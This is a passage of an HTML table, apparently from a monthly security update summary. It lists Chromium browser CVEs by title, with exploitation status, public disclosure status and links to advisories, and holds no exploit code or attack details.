Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7898">CVE-2026-7898</a></td><td><p>Chromium: CVE-2026-7898 Use after free in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7899">CVE-2026-7899</a></td><td><p>Chromium: CVE-2026-7899 Out of bounds read and write in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7900">CVE-2026-7900</a></td><td><p>Chromium: CVE-2026-7900 Heap buffer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7901">CVE-2026-7901</a></td><td><p>Chromium: CVE-2026-7901 Use after free in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7902">CVE-2026-7902</a></td><td><p>Chromium: CVE-2026-7902 Out of bounds memory access in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7903">CVE-2026-7903</a></td><td><p>Chromium: CVE-2026-7903 Integer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7904">CVE-2026-7904</a></td><td><p>Chromium: CVE-2026-7904 Out of bounds read in Fonts</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7906">CVE-2026-7906</a></td><td><p>Chromium: CVE-2026-7906 Use after free in SVG</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7907">CVE-2026-7907</a></td><td><p>Chromium: CVE-2026-7907 Use after free in DOM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7908">CVE-2026-7908</a></td><td><p>Chromium: CVE-2026-7908 Use after free in Fullscreen</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7909">CVE-2026-7909</a></td><td><p>Chromium: CVE-2026-7909 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7910">CVE-2026-7910</a></td><td><p>Chromium: CVE-2026-7910 Use after free in Views</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7911">CVE-2026-7911</a></td><td><p>Chromium: CVE-2026-7911 Use after free in Aura</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7914">CVE-2026-7914</a></td><td><p>Chromium: CVE-2026-7914 Type Confusion in Accessibility</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7916">CVE-2026-7916</a></td><td><p>Chromium: CVE-2026-7916 Insufficient data validation in InterestGroups</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7917">CVE-2026-7917</a></td><td><p>Chromium: CVE-2026-7917 Use after free in Fullscreen</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7918">CVE-2026-7918</a></td><td><p>Chromium: CVE-2026-7918 Use after free in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7919">CVE-2026-7919</a></td><td><p>Chromium: CVE-2026-7919 Use after free in Aura</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7920">CVE-2026-7920</a></td><td><p>Chromium: CVE-2026-7920 Use after free in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7921">CVE-2026-7921</a></td><td><p>Chromium: CVE-2026-7921 Use after free in Passwords</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7922">CVE-2026-7922</a></td><td><p>Chromium: CVE-2026-7922 Use after free in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7923">CVE-2026-7923</a></td><td><p>Chromium: CVE-2026-7923 Out of bounds write in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7924">CVE-2026-7924</a></td><td><p>Chromium: CVE-2026-7924 Uninitialized Use in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7925">CVE-2026-7925</a></td><td><p>Chromium: CVE-2026-7925 Use after free in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7926">CVE-2026-7926</a></td><td><p>Chromium: CVE-2026-7926 Use after free in PresentationAPI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7927">CVE-2026-7927</a></td><td><p>Chromium: CVE-2026-7927 Type Confusion in Runtime</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7928">CVE-2026-7928</a></td><td><p>Chromium: CVE-2026-7928 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7929">CVE-2026-7929</a></td><td><p>Chromium: CVE-2026-7929 Use after free in MediaRecording</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7930">CVE-2026-7930</a></td><td><p>Chromium: CVE-2026-7930 Insufficient validation of untrusted input in Cookies</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7932">CVE-2026-7932</a></td><td><p>Chromium: CVE-2026-7932 Insufficient policy enforcement in Downloads</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7933">CVE-2026-7933</a></td><td><p>Chromium: CVE-2026-7933 Out of bounds read in WebCodecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7934">CVE-2026-7934</a></td><td><p>Chromium: CVE-2026-7934 Insufficient validation of untrusted input in Popup Blocker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7935">CVE-2026-7935</a></td><td><p>Chromium: CVE-2026-7935 Inappropriate implementation in Speech</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7936">CVE-2026-7936</a></td><td><p>Chromium: CVE-2026-7936 Object lifecycle issue in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7937">CVE-2026-7937</a></td><td><p>Chromium: CVE-2026-7937 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7938">CVE-2026-7938</a></td><td><p>Chromium: CVE-2026-7938 Use after free in CSS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7939">CVE-2026-7939</a></td><td><p>Chromium: CVE-2026-7939 Inappropriate implementation in SanitizerAPI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7940">CVE-2026-7940</a></td><td><p>Chromium: CVE-2026-7940 Use after free in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7942">CVE-2026-7942</a></td><td><p>Chromium: CVE-2026-7942 Integer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7943">CVE-2026-7943</a></td><td><p>Chromium: CVE-2026-7943 Insufficient validation of untrusted input in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7944">CVE-2026-7944</a></td><td><p>Chromium: CVE-2026-7944 Insufficient validation of untrusted input in Persistent Cache</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7945">CVE-2026-7945</a></td><td><p>Chromium: CVE-2026-7945 Insufficient validation of untrusted input in COOP</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7946">CVE-2026-7946</a></td><td><p>Chromium: CVE-2026-7946 Insufficient policy enforcement in WebUI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7947">CVE-2026-7947</a></td><td><p>Chromium: CVE-2026-7947 Insufficient validation of untrusted input in Network</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7948">CVE-2026-7948</a></td><td><p>Chromium: CVE-2026-7948 Race in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7949">CVE-2026-7949</a></td><td><p>Chromium: CVE-2026-7949 Out of bounds read in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7950">CVE-2026-7950</a></td><td><p>Chromium: CVE-2026-7950 Out of bounds read and write in GFX</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7951">CVE-2026-7951</a></td><td><p>Chromium: CVE-2026-7951 Out of bounds write in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7952">CVE-2026-7952</a></td><td><p>Chromium: CVE-2026-7952 Insufficient policy enforcement in Extensions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7953">CVE-2026-7953</a></td><td><p>Chromium: CVE-2026-7953 Insufficient validation of untrusted input in Omnibox</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7954">CVE-2026-7954</a></td><td><p>Chromium: CVE-2026-7954 Race in Shared Storage</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7955">CVE-2026-7955</a></td><td><p>Chromium: CVE-2026-7955 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7956">CVE-2026-7956</a></td><td><p>Chromium: CVE-2026-7956 Use after free in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7957">CVE-2026-7957</a></td><td><p>Chromium: CVE-2026-7957 Out of bounds write in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7958">CVE-2026-7958</a></td><td><p>Chromium: CVE-2026-7958 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7959">CVE-2026-7959</a></td><td><p>Chromium: CVE-2026-7959 Inappropriate implementation in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7960">CVE-2026-7960</a></td><td><p>Chromium: CVE-2026-7960 Race in Speech</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7961">CVE-2026-7961</a></td><td><p>Chromium: CVE-2026-7961 Insufficient validation of untrusted input in Permissions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7962">CVE-2026-7962</a></td><td><p>Chromium: CVE-2026-7962 Insufficient policy enforcement in DirectSockets</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7963">CVE-2026-7963</a></td><td><p>Chromium: CVE-2026-7963 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7964">CVE-2026-7964</a></td><td><p>Chromium: CVE-2026-7964 Insufficient validation of untrusted input in FileSystem</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7965">CVE-2026-7965</a></td><td><p>Chromium: CVE-2026-7965 Insufficient validation of untrusted input in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7966">CVE-2026-7966</a></td><td><p>Chromium: CVE-2026-7966 Insufficient validation of untrusted input in SiteIsolation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7967">CVE-2026-7967</a></td><td><p>Chromium: CVE-2026-7967 Insufficient validation of untrusted input in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7968">CVE-2026-7968</a></td><td><p>Chromium: CVE-2026-7968 Insufficient validation of untrusted input in CORS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7969">CVE-2026-7969</a></td><td><p>Chromium: CVE-2026-7969 Integer overflow in Network</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7970">CVE-2026-7970</a></td><td><p>Chromium: CVE-2026-7970 Use after free in TopChrome</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7971">CVE-2026-7971</a></td><td><p>Chromium: CVE-2026-7971 Inappropriate implementation in ORB</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7972">CVE-2026-7972</a></td><td><p>Chromium: CVE-2026-7972 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7973">CVE-2026-7973</a></td><td><p>Chromium: CVE-2026-7973 Integer overflow in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7974">CVE-2026-7974</a></td><td><p>Chromium: CVE-2026-7974 Use after free in Blink</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7975">CVE-2026-7975</a></td><td><p>Chromium: CVE-2026-7975 Use after free in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7976">CVE-2026-7976</a></td><td><p>Chromium: CVE-2026-7976 Use after free in Views</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7977">CVE-2026-7977</a></td><td><p>Chromium: CVE-2026-7977 Inappropriate implementation in Canvas</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7978">CVE-2026-7978</a></td><td><p>Chromium: CVE-2026-7978 Inappropriate implementation in Companion</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7979">CVE-2026-7979</a></td><td><p>Chromium: CVE-2026-7979 Inappropriate implementation in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7980">CVE-2026-7980</a></td><td><p>Chromium: CVE-2026-7980 Use after free in WebAudio</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7981">CVE-2026-7981</a></td><td><p>Chromium: CVE-2026-7981 Out of bounds read in Codecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7982">CVE-2026-7982</a></td><td><p>Chromium: CVE-2026-7982 Uninitialized Use in WebCodecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7983">CVE-2026-7983</a></td><td><p>Chromium: CVE-2026-7983 Out of bounds read in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7984">CVE-2026-7984</a></td><td><p>Chromium: CVE-2026-7984 Use after free in ReadingMode</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7985">CVE-2026-7985</a></td><td><p>Chromium: CVE-2026-7985 Use after free in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7986">CVE-2026-7986</a></td><td><p>Chromium: CVE-2026-7986 Insufficient policy enforcement in Autofill</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7987">CVE-2026-7987</a></td><td><p>Chromium: CVE-2026-7987 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7988">CVE-2026-7988</a></td><td><p>Chromium: CVE-2026-7988 Type Confusion in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7989">CVE-2026-7989</a></td><td><p>Chromium: CVE-2026-7989 Insufficient data validation in DataTransfer</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7990">CVE-2026-7990</a></td><td><p>Chromium: CVE-2026-7990 Insufficient validation of untrusted input in Updater</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7991">CVE-2026-7991</a></td><td><p>Chromium: CVE-2026-7991 Use after free in UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7992">CVE-2026-7992</a></td><td><p>Chromium: CVE-2026-7992 Insufficient validation of untrusted input in UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7994">CVE-2026-7994</a></td><td><p>Chromium: CVE-2026-7994 Inappropriate implementation in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7995">CVE-2026-7995</a></td><td><p>Chromium: CVE-2026-7995 Out of bounds read in AdFilter</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7996">CVE-2026-7996</a></td><td><p>Chromium: CVE-2026-7996 Insufficient validation of untrusted input in SSL</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7997">CVE-2026-7997</a></td><td><p>Chromium: CVE-2026-7997 Insufficient validation of untrusted input in Updater</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7998">CVE-2026-7998</a></td><td><p>Chromium: CVE-2026-7998 Insufficient validation of untrusted input in Dialog</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7999">CVE-2026-7999</a></td><td><p>Chromium: CVE-2026-7999 Inappropriate implementation in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8000">CVE-2026-8000</a></td><td><p>Chromium: CVE-2026-8000 Insufficient validation of untrusted input in ChromeDriver</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8001">CVE-2026-8001</a></td><td><p>Chromium: CVE-2026-8001 Use after free in Printing</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8002">CVE-2026-8002</a></td><td><p>Chromium: CVE-2026-8002 Use after free in Audio</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8003">CVE-2026-8003</a></td><td><p>Chromium: CVE-2026-8003 Insufficient validation of untrusted input in TabGroups</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8004">CVE-2026-8004</a></td><td><p>Chromium: CVE-2026-8004 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8005">CVE-2026-8005</a></td><td><p>Chromium: CVE-2026-8005 Insufficient validation of untrusted input in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8006">CVE-2026-8006</a></td><td><p>Chromium: CVE-2026-8006 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8007">CVE-2026-8007</a></td><td><p>Chromium: CVE-2026-8007 Insufficient validation of untrusted input in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8008">CVE-2026-8008</a></td><td><p>Chromium: CVE-2026-8008 Inappropriate implementation in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8009">CVE-2026-8009</a></td><td><p>Chromium: CVE-2026-8009 Inappropriate implementation in Cast</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8010">CVE-2026-8010</a></td><td><p>Chromium: CVE-2026-8010 Insufficient validation of untrusted input in SiteIsolation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8011">CVE-2026-8011</a></td><td><p>Chromium: CVE-2026-8011 Insufficient policy enforcement in Search</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8012">CVE-2026-8012</a></td><td><p>Chromium: CVE-2026-8012 Inappropriate implementation in MHTML</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8013">CVE-2026-8013</a></td><td><p>Chromium: CVE-2026-8013 Insufficient validation of untrusted input in FedCM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8014">CVE-2026-8014</a></td><td><p>Chromium: CVE-2026-8014 Inappropriate implementation in Preload</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8015">CVE-2026-8015</a></td><td><p>Chromium: CVE-2026-8015 Inappropriate implementation in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8016">CVE-2026-8016</a></td><td><p>Chromium: CVE-2026-8016 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8017">CVE-2026-8017</a></td><td><p>Chromium: CVE-2026-8017 Side-channel information leakage in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8018">CVE-2026-8018</a></td><td><p>Chromium: CVE-2026-8018 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8019">CVE-2026-8019</a></td><td><p>Chromium: CVE-2026-8019 Insufficient policy enforcement in WebApp</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8021">CVE-2026-8021</a></td><td><p>Chromium: CVE-2026-8021 Script injection in 